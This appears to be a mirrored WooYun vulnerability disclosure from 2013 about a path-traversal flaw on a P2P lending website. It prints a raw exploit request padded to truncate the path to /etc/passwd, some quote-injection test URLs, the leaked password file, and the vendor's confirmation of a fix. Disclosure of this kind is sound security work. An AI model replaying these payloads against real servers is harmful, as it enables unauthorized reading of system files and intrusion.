乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-03: 细节已通知厂商并且等待厂商处理中 2013-08-05: 厂商已经确认,细节仅向厂商公开 2013-08-15: 细节向核心白帽子及相关领域专家公开 2013-08-25: 细节向普通白帽子公开 2013-09-04: 细节向实习白帽子公开 2013-09-17: 细节向公众公开
POST /?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. HTTP/1.1Content-Length: 515Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_RQPIAHRQSKReferer: http://www.dyp2p.com:80/Cookie: PHPSESSID=61bb9f8e5bc87318e1e64296fefafb1f; CNZZDATA4240563=cnzz_eid%3D1387105205-1375496404-http%253A%252F%252Fwww.dyp2p.com%26ntime%3D1375496404%26cnzz_a%3D0%26retime%3D1375496407635%26sin%3Djavascript%253A6JLyWeSokucJWPaS()%253C%253E%26ltime%3D1375496407635%26rtime%3D0Host: www.dyp2p.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */*-------AcunetixBoundary_RQPIAHRQSKContent-Disposition: form-data; name="content"1-------AcunetixBoundary_RQPIAHRQSKContent-Disposition: form-data; name="email"[email protected]-------AcunetixBoundary_RQPIAHRQSKContent-Disposition: form-data; name="name"afsvgtlh-------AcunetixBoundary_RQPIAHRQSKContent-Disposition: form-data; name="submit"¸øÎÒÁôÑÔ-------AcunetixBoundary_RQPIAHRQSKContent-Disposition: form-data; name="tel"555-666-0606-------AcunetixBoundary_RQPIAHRQSK--
http://www.dyp2p.com/search/index.html?web_url=1'%22http://www.dyp2p.com/case/index.html?case_type=1'%22http://www.dyp2p.com/case/index1.html?case_type=1'%22http://www.dyp2p.com/case/index2.html?case_type=1'%22
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shDebian-exim:x:101:103::/var/spool/exim4:/bin/falsestatd:x:102:65534::/var/lib/nfs:/bin/falsesshd:x:103:65534::/var/run/sshd:/usr/sbin/nologinntp:x:104:106::/home/ntp:/bin/falsemysql:x:105:108:MySQL Server,,,:/var/lib/mysql:/bin/falseproftpd:x:106:65534::/var/run/proftpd:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsedyphp:x:1000:1000::/var/www/dyphp.net:/bin/falsedyp2pnet:x:1001:1001::/var/www/:/bin/false
危害等级:中
漏洞Rank:10
确认时间:2013-08-05 14:31
谢谢,漏洞个已经修补。感恩您的关注,里面少加了个过滤。
暂无